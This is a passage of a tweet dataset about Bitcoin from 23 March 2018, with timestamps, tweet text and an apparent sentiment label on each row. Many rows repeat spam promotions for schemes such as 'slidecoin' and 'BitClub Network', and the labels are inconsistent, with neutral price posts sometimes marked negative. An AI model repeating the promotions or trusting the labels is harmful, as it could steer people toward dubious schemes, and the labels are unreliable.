make headway ...",1.0 +Fri Mar 23 05:58:29 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:58:41 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:59:03 +0000 2018,Valores | dolar R$3.3019 | BITCOIN(MCDTBC) R$30394.88877000 | BITCOIN(BLCHAIN) R$27834.002486 | LITECOIN(MCDTBC) R$574.99000000,0.0 +Fri Mar 23 05:59:06 +0000 2018,"#Vrmed @vr1med creating the future of vision equipment, top-tier VR headset. #ICO #crowdsale #bitcoin #ethereum #token",0.0 +Fri Mar 23 05:59:14 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:59:23 +0000 2018,If you would like to donate BitCoin towards the cost of my hosting send to: -> 1KBw1KzVDkqkipaDMVAxfMa5gzzwGzUXuH | #SupportAI #Anonymous,0.0 +Fri Mar 23 05:59:40 +0000 2018,What do you think will be the next big success like bitcoin? 
#cryptocurrency #ico,1.0 +Fri Mar 23 05:59:58 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:00:00 +0000 2018,"This just in: Bitcoin is rising! +Current Rate: 8401.86 USD = 1 BTC",0.0 +Fri Mar 23 06:00:00 +0000 2018,"@ #1, Bitcoin with unit price of $8,443.26, market cap of $142,982,909,952 (44.35%), and 24 hr vol. of $5,521,670,000 (37.67%)",0.0 +Fri Mar 23 06:00:02 +0000 2018,"Bitcoin - BTC +Price: $8,443.26 +Change in 1h: -0.07% +Market cap: $142,982,909,952.00 +Ranking: 1 +#Bitcoin #BTC",0.0 +Fri Mar 23 06:00:02 +0000 2018,"Bitcoin:$8437.14 +Ethereum:$518.863 +Bitcoin Cash:$971.23 +Litecoin:$158.259 +Ripple:$0.634721 +IOTA:$1.27298",0.0 +Fri Mar 23 06:00:02 +0000 2018,"Average Bitcoin market price is: USD 8,401.86, EUR 6,812.67",-1.0 +Fri Mar 23 06:00:03 +0000 2018,Current BTC Dominance: 44.32% #Bitcoin #Altcoin #Cryptocurrency,0.0 +Fri Mar 23 06:00:03 +0000 2018,"1 bitcoin = $8437.14 / 6848.004€ +1 bitcoin-cash = $970.355 / 787.588€ +1 ethereum = $518.863 / 421.135€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 06:00:04 +0000 2018,"23Mar2018 06:00 UTC #Bitcoin #Blockchain status - Last 24h: 135 blocks mined - 1,036,281 BTC output - 182,105 transactions",0.0 +Fri Mar 23 06:00:04 +0000 2018,"Keep centered on the story which will become Bitcoin's destiny: It is not just a money, it is an innovation, a protocol, a technology.",0.0 +Fri Mar 23 06:00:01 +0000 2018,"Mar 22, 2018 11:00PM #Bitcoin Price: +USD 8643.95 | EUR 7021.63 | JPY 918005.47",0.0 +Fri Mar 23 06:00:11 +0000 2018,@jolb_ Top 10 Emotions The Biggest Bitcoin Miners Doesn’t Want You To Know About,1.0 +Fri Mar 23 06:00:12 +0000 2018,"1 #BTC (#Bitcoin) quotes: +$8413.78/$8417.76 #Bitstamp +$8408.90/$8411.29 #Kraken +⇢$-8.86/$-2.49 +$8365.08/$8449.17 #Coinbase +⇢$-52.68/$35.39",0.0 +Fri Mar 23 06:00:18 +0000 2018,@zebpay Tcc is next bitcoin,0.0 +Fri Mar 23 06:00:26 +0000 2018,"Earn bitcoin on a daily basis! + +1. 
Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:00:26 +0000 2018,#Bitcoin Price 8381.02 USD via Chain,0.0 +Fri Mar 23 06:00:28 +0000 2018,#DASH Price is 0.0477892 (+0.00034490) #BTC / 401.096 (+3.46300) #USD. Market rank is 11. #dash #bitcoin #blockchain,-1.0 +Fri Mar 23 06:00:29 +0000 2018,#ADA Price is 0.00002259 (+0.00000007) #BTC / 0.189612 (+0.00057) #USD. Market rank is 6. #cardano #bitcoin #blockchain,-1.0 +Fri Mar 23 06:00:29 +0000 2018,#SUB Price is 0.00004558 (-0.00000025) #BTC / 0.382547 (-0.00151) #USD. Market rank is 116. #substratum #bitcoin #blockchain,-1.0 +Fri Mar 23 06:00:29 +0000 2018,#XEM Price is 0.00003291 (+0.00000001) #BTC / 0.276204 (+0.00048) #USD. Market rank is 13. #nem #bitcoin #blockchain,-1.0 +Fri Mar 23 06:00:30 +0000 2018,"BTC hourly update +$8409.78 | -0.0025%📉 +$BTC #BTCUSD #Bitcoin",0.0 +Fri Mar 23 06:00:30 +0000 2018,#EOS Price is 0.00078247 (+0.00000498) #BTC / 6.56728 (+0.04150) #USD. Market rank is 7. #eos #bitcoin #blockchain,-1.0 +Fri Mar 23 06:00:35 +0000 2018,"It's March 23, 2018 at 08:00AM, good morning people, ready for a new and #wild day?! #bitcoin #litecoin #dogecoin #monero #usd #btc #nxt",1.0 +Fri Mar 23 06:00:52 +0000 2018,"It's March 23, 2018 at 08:00AM, good morning people, ready for a new and #wild day?! #bitcoin #litecoin #dogecoin #monero #usd #btc #nxt",1.0 +Fri Mar 23 06:00:53 +0000 2018,"#Bitcoin $8,418.00 v #BitcoinCash $968.24 (BTC/BCH 8.7), Avg Transaction fee for #Bitcoin ~$1.32 v #BitcoinCash ~$0.10 - 2018/03/23 15:00JST",0.0 +Fri Mar 23 06:00:54 +0000 2018,"It's March 23, 2018 at 08:00AM, good morning people, ready for a new and #wild day?! 
#bitcoin #litecoin #dogecoin #monero #usd #btc #nxt",1.0 +Fri Mar 23 06:01:16 +0000 2018,Current price of Bitcoin is $8382.00 “Like” if thats good for you and “retweet” if thats not good for you #bitcoin #btc #bitcoinprice,1.0 +Fri Mar 23 06:01:35 +0000 2018,Current price of Bitcoin is $8382.00.,0.0 +Fri Mar 23 06:01:36 +0000 2018,Bitcoin 8382.00 $,0.0 +Fri Mar 23 06:02:07 +0000 2018,Bitcoin is $8382.00 🔔 $BTC,0.0 +Fri Mar 23 06:02:12 +0000 2018,"#RamenCoin $RAMEN #airdrop #bounty #ICO #ethereum #blockchain #bitcoin #BTS #cryptocurrency #altcoin +@mskumar230078",0.0 +Fri Mar 23 06:02:15 +0000 2018,"It's March 23, 2018 at 08:00AM, good morning people, ready for a new and #wild day?! #bitcoin #litecoin #dogecoin #monero #usd #btc #nxt",1.0 +Fri Mar 23 06:02:25 +0000 2018,Current price of Bitcoin is $8382.00,0.0 +Fri Mar 23 06:02:28 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:02:39 +0000 2018,"Bitcoin percentage of market cap: 44.35 % +#BPOMC #Bitcoin #Altcoin #Blockchain #Cryptocurrency #Dominance",0.0 +Fri Mar 23 06:02:40 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:03:02 +0000 2018,"CIBUS network is a block chain based eco system on food and health supplements' +#bitcoin #ICO #ethereum #blockchain #cryptocurrency #CIBUS",0.0 +Fri Mar 23 06:03:05 +0000 2018,"THE MOST INNOVATIVE AND LUCRATIVE WAY TO EARN BITCOIN +JOIN BITCLUB NETWORK! !",1.0 +Fri Mar 23 06:03:14 +0000 2018,Current price of #Bitcoin is $8382.00,0.0 +Fri Mar 23 06:03:16 +0000 2018,CIBUS network is a block chain based eco system on food and health supplements #bitcoin #ICO #ethereum #blockchain #cryptocurrency #CIBUS,0.0 +Fri Mar 23 06:03:56 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:04:21 +0000 2018,Not afraid of heights - afraid of widths. 
#bitcoin #mining #free,1.0 +Fri Mar 23 06:04:22 +0000 2018,Bitcoin $8382.00 via Chain,0.0 +Fri Mar 23 06:04:24 +0000 2018,Current price of #Bitcoin is $8382.00 via Chain #BTCUSD #cryptocurrencies #blockchain,0.0 +Fri Mar 23 06:04:27 +0000 2018,@yahaya_aminu Ditcoin is best cryptocurrency ditcoin my life Bitcoin my dream,1.0 +Fri Mar 23 06:04:29 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:05:40 +0000 2018,BITCOIN IS AT 8445.2475,0.0 +Fri Mar 23 06:06:21 +0000 2018,"#surprise #presents #crypto #bitcoin #ethereum #litecoin #tron #blockchain #party #game #cryptonews + +its awesome technology",1.0 +Fri Mar 23 06:06:37 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:06:52 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:06:54 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:07:10 +0000 2018,"MEarn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:07:30 +0000 2018,Bitcoin is the new gold ! Retweet if you agree #bitcoins #bitcoinisgold #bitcoinworld #bitcoinnews #bitcoin,1.0 +Fri Mar 23 06:07:36 +0000 2018,@bxbynatyy_ Bitcoin by @RiceGum 🔥,0.0 +Fri Mar 23 06:07:50 +0000 2018,$NEOUSD entering oversold zone on interval 60m #cryptocurrency #trading #bitcoin #crypto #technicalanalysis,0.0 +Fri Mar 23 06:07:50 +0000 2018,"guys, Bitcoin is SO cool 😎",1.0 +Fri Mar 23 06:08:09 +0000 2018,"Fri Mar 23 07:07:28 2018 (42:07) +USD : 8456.67 +Wght: 0.42 +Blk#: 514766 +Size: 1061.3 KB +TXs: 2194 +Pool: 2301 (1.5 MB) +#bitcoin",0.0 +Fri Mar 23 06:08:23 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. 
Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:08:49 +0000 2018,New #bitcoin block 000000000000000000302f93f324f3ff181ef7b90b0fa362e598a4282359d8b9 mined at height 514766.,1.0 +Fri Mar 23 06:09:08 +0000 2018,BTC $8437.14 Down -$23.19 -0.27% in the last hour #bitcoin #bitsmart,-1.0 +Fri Mar 23 06:09:06 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:09:22 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:09:28 +0000 2018,@mrupsys @alistairmilne So now bitcoin is an indication of intellectual ability?,1.0 +Fri Mar 23 06:09:32 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:09:43 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:09:58 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:10:03 +0000 2018,"Bitcoin BTC Current Price: +$8.460,410 +1 Hour: 0.16 % | 24 Hours: -6.42 % | 7 Days: 3.24 % +#btc #bitcoin",0.0 +Fri Mar 23 06:10:03 +0000 2018,"1 bitcoin = $8476.41 / 6872.088€ +1 bitcoin-cash = $974.314 / 789.906€ +1 ethereum = $523.501 / 424.419€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 06:10:30 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:11:01 +0000 2018,@Bitcoin Worrying! Looks like the way they do their routing currently is flawed. I hope they fix this.,-1.0 +Fri Mar 23 06:11:14 +0000 2018,"5c7cf1999d445141efe2e6fa5744b6b7c8d4cb6a822a9c767aa7bf4be03edad6/1 +says: Moving Mbit! +#opreturn #bitcoin",0.0 +Fri Mar 23 06:11:14 +0000 2018,"432835a27ab9454aa84965fa94656a7b8dc93a485326f11a809363992cabac5b/1 +says: Moving Mbit! 
+#opreturn #bitcoin",0.0 +Fri Mar 23 06:11:16 +0000 2018,"0387e434ab2d22b18484c814ce53ff04f6c612bddc82e01e4da31c2727dd41a3/1 +says: Moving Mbit! +#opreturn #bitcoin",0.0 +Fri Mar 23 06:11:18 +0000 2018,"eadf150ea606e1eafacb4818112bd04dc338d9b5cb7980729e6297a3be87c06f/1 +says: Moving Mbit! +#opreturn #bitcoin",0.0 +Fri Mar 23 06:11:20 +0000 2018,"54c46c61ca70a4928d435d791a0085dd119b49ba229ae37e667c71ab93ccd71c/1 +says: Moving Mbit! +#opreturn #bitcoin",0.0 +Fri Mar 23 06:11:22 +0000 2018,"74caa12b03207a43e3d9c52cfd736e72a01ffcaee2f8b6991bda1473a2748ff8/1 +says: Moving Mbit! +#opreturn #bitcoin",0.0 +Fri Mar 23 06:11:24 +0000 2018,"d8e78ddd912abc05ba635fba92e5349a23f6dbf6c6a457e6d7a6503a47b95119/1 +says: Moving Mbit! +#opreturn #bitcoin",0.0 +Fri Mar 23 06:11:28 +0000 2018,Bitcoin value: $8456.44,0.0 +Fri Mar 23 06:11:41 +0000 2018,Bitcoin Drops Over 4% After Japan Warns World's Largest Cryptocurrency Exchange.,0.0 +Fri Mar 23 06:12:25 +0000 2018,Everyone worried about the impending US-China Trade War? Invest in Cryptocurrancies #bitcoin #ethereum,0.0 +Fri Mar 23 06:12:31 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:12:34 +0000 2018,"Bitcoin just moves this fast now, it aint fast, young, and fun anymore. Kinda like me.",1.0 +Fri Mar 23 06:12:59 +0000 2018,@ProfFaustus Jesus this was like reading a tabloid article. So you are advertising to be doing what Bitcoin already does? 
Great.,1.0 +Fri Mar 23 06:13:00 +0000 2018,i take great care about bitcoin can i just buy some ethereum on minecraft,1.0 +Fri Mar 23 06:13:41 +0000 2018,"Here’s a very good video on bitcoin guys, just watch it!",1.0 +Fri Mar 23 06:14:07 +0000 2018,"another dip for #bitcoin from $9k to $8k, a good time to buy.😀 #BTC #trading #bitconprice #price #Crypto #cryptocurrency",1.0 +Fri Mar 23 06:14:24 +0000 2018,"this guy brought up bitcoin on a first date but i'm considering a second b/c he had nice hair...i really do hate myself, huh",1.0 +Fri Mar 23 06:14:25 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:14:33 +0000 2018,"More +#Ice #Pay #Airdrop #Bounty #Transaction #Performance #Bitcoin #Ethereum #MEW",1.0 +Fri Mar 23 06:14:46 +0000 2018,"Current Bitcoin Price = $9448.00 --- Includes Sum of Forks, Core $8422.00 (89.14%) + Cash $968.87 (10.25%) + Gold $57.13 (0.60%)",0.0 +Fri Mar 23 06:14:48 +0000 2018,"@magicalmoney_ Enter draw to win ten million MIM$ #bitcoin #crypto +@IGlowInThe_Dark +@shamsudean1 + +3PEcKmEvpSanttic7TKtjFvgqFL3pgPhDKm",1.0 +Fri Mar 23 06:15:03 +0000 2018,"The current price of Bitcoin is $8476.41. +The current price of BCash is $974.314, or 0.115429 BTC",0.0 +Fri Mar 23 06:15:06 +0000 2018,"TUBI will be listed at coinmarketcap very soon! +#Altcoins #bitcoin #TokenFest #tokenSale #ethereum #Cryptos #cryptotrading",1.0 +Fri Mar 23 06:15:18 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:16:06 +0000 2018,"@magicalmoney_ @CHUDDI_KAY @youb +Enter draw to win ten million MIM$ #bitcoin #crypto + +3PEcKmEvpSanttic7TKtjFvgqFL3pgPhDKm",1.0 +Fri Mar 23 06:16:15 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. 
Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:16:41 +0000 2018,"@magicalmoney_ @UMARUBERNARD @crypto_xpress +Enter draw to win ten million MIM$ #bitcoin #crypto + +3PEcKmEvpSanttic7TKtjFvgqFL3pgPhDKm",1.0 +Fri Mar 23 06:17:03 +0000 2018,"Bitcoin Cash BCH Current Price: +$974,314 +1 Hour: 0.27 % | 24 Hours: -7.08 % | 7 Days: 5.90 % +#bch #bitcoin cash",0.0 +Fri Mar 23 06:17:03 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:17:26 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:17:27 +0000 2018,"@PatWielandLIVE @DigiByteCoin #DigiByte baby, yeahhhhh buddy!! + +#DigiHash #DigibyteOneClickMiner #InternationalDayOfHappiness #bitcoin",0.0 +Fri Mar 23 06:17:47 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:17:50 +0000 2018,@CodeSCrypto @coindesk Like... why has Bitcoin not climbed to $1.0Mil yet from this? Lol,1.0 +Fri Mar 23 06:18:00 +0000 2018,Two Hour Lull Update: CryptoCompare Bitcoin price: $8419.34 #bitcoin,0.0 +Fri Mar 23 06:18:01 +0000 2018,POWR is now £0.24. #crypto #cryptocurrency #bitcoin #altcoins,0.0 +Fri Mar 23 06:18:05 +0000 2018,"inb4: ""Black Friday"" $btc $DJI #crypto #bitcoin #tradewars #donaldpump",-1.0 +Fri Mar 23 06:18:41 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:18:49 +0000 2018,@zebpay Tcc one and only one best second Bitcoin cryptocrency,1.0 +Fri Mar 23 06:20:04 +0000 2018,"1 bitcoin = $8480.91 / 6875.736€ +1 bitcoin-cash = $974.49 / 790.049€ +1 ethereum = $524.644 / 425.345€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 06:20:22 +0000 2018,@Cylinders_io Interesting project good future for him! 
#CCA #ICO #Crowdsale #Bitcoin #Blockchain #Token #ETH #Ethereum #TokenSale,1.0 +Fri Mar 23 06:21:07 +0000 2018,@MarkYusko @FoxBusiness @MorningsMaria @MariaBartiromo is there an over under on how many times you use the word ‘bitcoin’ on the show?,1.0 +Fri Mar 23 06:21:27 +0000 2018,@chuckwoolery All the more reason to give gun owners and gun dealers reason to use Bitcoin!!,1.0 +Fri Mar 23 06:21:51 +0000 2018,@ValoremF this is something we need in the future. #AdVelorem #Bitcoin #Valorem #Ico #VLR,0.0 +Fri Mar 23 06:21:52 +0000 2018,"@missbitcoin_mai I wish Bitcoin was spelled ""Bit-o-coin"", sounds cool",1.0 +Fri Mar 23 06:22:06 +0000 2018,"@superwuster Bitcoin. +Have never used Amazon in Australia.",0.0 +Fri Mar 23 06:22:07 +0000 2018,"Yea I refer to cash as prehistoric money. Deal with it. + +#cryptocurrency #Bitcoin #blockchain #PIVX",0.0 +Fri Mar 23 06:22:09 +0000 2018,@nytimes @Bitcoin All the more reason for gun owners and gun dealers start using bitcoin!!,1.0 +Fri Mar 23 06:22:17 +0000 2018,Excellent projects always deserve a lot of attention. #ICO #Crowdsale #Bitcoin #Blockchain #Token #ETH #Ethereum #TokenSale,1.0 +Fri Mar 23 06:22:51 +0000 2018,"@esocktheman 2-time best man, ordained wedding officiant and international battle rapper. hmu for rates, Bitcoin only.",1.0 +Fri Mar 23 06:23:17 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:23:39 +0000 2018,@BKachel Are you the bitcoin spammer!?,0.0 +Fri Mar 23 06:24:40 +0000 2018,"@rogerkver @Falkvinge and thousands of people who went in 2011 all in, don’t care about bitcoin cash🤔",0.0 +Fri Mar 23 06:24:45 +0000 2018,"@officialmcafee John, do you know if bitcoin is a creature of CIA?",0.0 +Fri Mar 23 06:24:51 +0000 2018,Add the two letters„ch“ somwhere to #bitcoin. Yeah right... that‘s some swiss bank conpiracy theory shit. Don‘t buy this crap!,-1.0 +Fri Mar 23 06:25:21 +0000 2018,"Earn bitcoin on a daily basis! + +1. 
Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:26:14 +0000 2018,Fuck a bitcoin,-1.0 +Fri Mar 23 06:26:20 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:26:22 +0000 2018,Interested in learning more about blockchain and cryptocurrency like Bitcoin? Come join me and IBM at the IBM Coder Program! #IBMCoder,1.0 +Fri Mar 23 06:26:54 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:27:05 +0000 2018,@JeremyRubin @prestonjbyrne How bout you create a Bitcoin fork for people that want to call Satoshi she? 😂,0.0 +Fri Mar 23 06:27:39 +0000 2018,@aliraja How can you 'predict' when bitcoin goes down?,-1.0 +Fri Mar 23 06:28:40 +0000 2018,Mainly focuses on #bitcoin and #ethereum,1.0 +Fri Mar 23 06:28:41 +0000 2018,"@BeenSuave_23 def time machine.. i can buy bitcoin before the blow up, and see my lost ones..",0.0 +Fri Mar 23 06:29:04 +0000 2018,@DavidHayCrypto But the real question is: How much Bitcoin is it worth?,1.0 +Fri Mar 23 06:30:02 +0000 2018,"Bitcoin:$8452.41 +Ethereum:$522.493 +Bitcoin Cash:$971.799 +Litecoin:$158.521 +Ripple:$0.636124 +IOTA:$1.27449",0.0 +Fri Mar 23 06:30:03 +0000 2018,"1 bitcoin = $8452.41 / 6852.63€ +1 bitcoin-cash = $971.799 / 787.867€ +1 ethereum = $521.708 / 422.965€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 06:30:05 +0000 2018,One Bitcoin now worth $8417.00@bitstamp. High $9028.740. Low $8342.000. Market Cap $142.535 Billion #bitcoin,1.0 +Fri Mar 23 06:30:05 +0000 2018,"FACT: Bitcoin network speed in 2013 began at 25TH/s and reached 11000TH/s by years end, eclipsing all of the worlds supercomputers combined.",0.0 +Fri Mar 23 06:30:28 +0000 2018,#EOS Price is 0.00078052 (-0.00000195) #BTC / 6.56003 (-0.00725) #USD. Market rank is 7. 
#eos #bitcoin #blockchain,-1.0 +Fri Mar 23 06:30:29 +0000 2018,#ADA Price is 0.00002255 (-0.00000004) #BTC / 0.189556 (-0.00006) #USD. Market rank is 6. #cardano #bitcoin #blockchain,-1.0 +Fri Mar 23 06:30:30 +0000 2018,#DASH Price is 0.0478863 (+0.00009710) #BTC / 402.467 (+1.37100) #USD. Market rank is 11. #dash #bitcoin #blockchain,-1.0 +Fri Mar 23 06:30:30 +0000 2018,#SUB Price is 0.00004536 (-0.00000022) #BTC / 0.381257 (-0.00129) #USD. Market rank is 116. #substratum #bitcoin #blockchain,-1.0 +Fri Mar 23 06:30:30 +0000 2018,#XEM Price is 0.00003306 (+0.00000015) #BTC / 0.277827 (+0.00162) #USD. Market rank is 13. #nem #bitcoin #blockchain,-1.0 +Fri Mar 23 06:31:13 +0000 2018,"Hello humans, #Bitcoin is currently around $8452.41 as of Fri Mar 23 01:31:09 CDT 2018",0.0 +Fri Mar 23 06:31:29 +0000 2018,Bitcoin value: $8423.62,0.0 +Fri Mar 23 06:32:22 +0000 2018,"The technology is not under threat at all, it is extraordinary, highly successful #pauldavis #bitcoin #bitcoins #btc",1.0 +Fri Mar 23 06:32:26 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:33:17 +0000 2018,@BitcoinEdu And now we are close to 25 Exahash/s and it's turned out to be one of the big challenges with #Bitcoin.,0.0 +Fri Mar 23 06:33:26 +0000 2018,"It's already happening, an informed govt. will never stop it. 
@wef #bitcoin #blockchain #ethereum #cryptocurrency #altcoi",0.0 +Fri Mar 23 06:33:53 +0000 2018,I just won free 10 satoshi from PlayBitcoin 😍 #bitcoin #faucet #satoshi #freebitcoin @welovefaucet,1.0 +Fri Mar 23 06:35:03 +0000 2018,"‘Diet Bitcoin’: Brother of Drug Kingpin Pablo Escobar Launches Bizarre ICO, Claims He Met Satoshi #blockchain $btc #trading",1.0 +Fri Mar 23 06:35:32 +0000 2018,@FaucetHubIO how can I make a new address for bitcoin?,1.0 +Fri Mar 23 06:35:35 +0000 2018,binance...bitcoin.......Bussy,0.0 +Fri Mar 23 06:35:39 +0000 2018,"BITCOIN futures: 8,400 (-200)",0.0 +Fri Mar 23 06:36:01 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:36:44 +0000 2018,@CaptainScio dude u are amazing. Whats ur latest thoughts on crypto and bitcoin etc... in relation to Gann theory,1.0 +Fri Mar 23 06:37:11 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:38:27 +0000 2018,"The year is 2020: + +The Bitcoin community has forked again due to irreconcilable differences about Satoshi's gender.",-1.0 +Fri Mar 23 06:38:34 +0000 2018,@AnselLindner @Bitcoin And they act like they're decentralized. Talk about virtue signaling.,0.0 +Fri Mar 23 06:38:39 +0000 2018,@FoxBusiness #2A banking system just gave every American reason to start using #bitcoin!! #cryptocurrency,0.0 +Fri Mar 23 06:39:01 +0000 2018,"Sea of Red for #cryptocurrency today. #Bitcoin, #Ethereum, #Ripple take the plunge. Hope you enjoy the profits",1.0 +Fri Mar 23 06:39:13 +0000 2018,Hey team...Just a reminder that the ICO price of $WAN was .34$....patience. 
#Bitcoin #eth #neo,-1.0 +Fri Mar 23 06:39:44 +0000 2018,@_Kevin_Pham Yeah but Bitcoin Trans is going to be FABULOUUUUUS!,0.0 +Fri Mar 23 06:39:46 +0000 2018,Goldman Sachs apparently requires 100% margin from most customers for clearing BITCOIN FUTURES.,1.0 +Fri Mar 23 06:40:02 +0000 2018,"1 bitcoin = $8449.82 / 6850.531€ +1 bitcoin-cash = $967.86 / 784.674€ +1 ethereum = $521.273 / 422.612€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 06:40:09 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:40:19 +0000 2018,@ICODrops Another killer eth and bitcoin :))))))))(,1.0 +Fri Mar 23 06:40:36 +0000 2018,@BloombergDotOrg @Mayors4Climate Talk Bitcoin only!!!,0.0 +Fri Mar 23 06:40:45 +0000 2018,Next stop 5k. $Bitcoin is a bubble of noobs.,0.0 +Fri Mar 23 06:41:21 +0000 2018,"฿ value over 3 months: --40.71%, ($-5768) [Currently $8402.005] #bitcoin",0.0 +Fri Mar 23 06:41:39 +0000 2018,@zebpay The Champcoin is next Bitcoin.Tcc is Frist cryptocurrency in India.I love Tcc,1.0 +Fri Mar 23 06:42:19 +0000 2018,"Optimal tx fee: 5 satoshi per byte. +BTC : $8410 / €6820 / £5960 @ Block 514766. +Market Cap: 143.29B USD. #Bitcoin #Finance",0.0 +Fri Mar 23 06:43:17 +0000 2018,Current price of Bitcoin is $8382.00 #Bitcoin #Bithound,0.0 +Fri Mar 23 06:43:25 +0000 2018,"$ICX listing on #bithumb is today and not the 25th. Hope there will be some good price action! • +• +#icon #btc #bitcoin #cryptocurrency",1.0 +Fri Mar 23 06:43:32 +0000 2018,@benchten Are “billioins” some new type of bitcoin?,1.0 +Fri Mar 23 06:44:00 +0000 2018,"really want to donate to sci-hub for its priceless service rendered to all broke students but why do u only accept bitcoin, sci-hub.",1.0 +Fri Mar 23 06:44:23 +0000 2018,"425 #Bitcoin mined since last tweet. 
+ + It represents $3,587,425 (At $8,441 per $BTC #BTC) + New Supply: 16,934,575 + Progress: 80.64 %",1.0 +Fri Mar 23 06:45:06 +0000 2018,@infowars It’s time to fight the banks use bitcoin to buy your guns! #bitcoinnews #2A #cryptocurrencies,0.0 +Fri Mar 23 06:45:11 +0000 2018,Got left holding a bag while I was sleeping. #crypto #cryptocurrencies #btc #Bitcoin,0.0 +Fri Mar 23 06:46:01 +0000 2018,"BITCOIN futures: 8,390 (-210)",0.0 +Fri Mar 23 06:46:03 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:46:27 +0000 2018,@Cyrii_Lightning 100 percent....it's a pile of dogshit to hold while bitcoin is falling,0.0 +Fri Mar 23 06:46:55 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:47:08 +0000 2018,"Who else is ""Doubling Down"" on Bitcoin? +Peter Thiel +Rainer-Marc Frey +....",-1.0 +Fri Mar 23 06:47:20 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:47:43 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:47:46 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:47:53 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 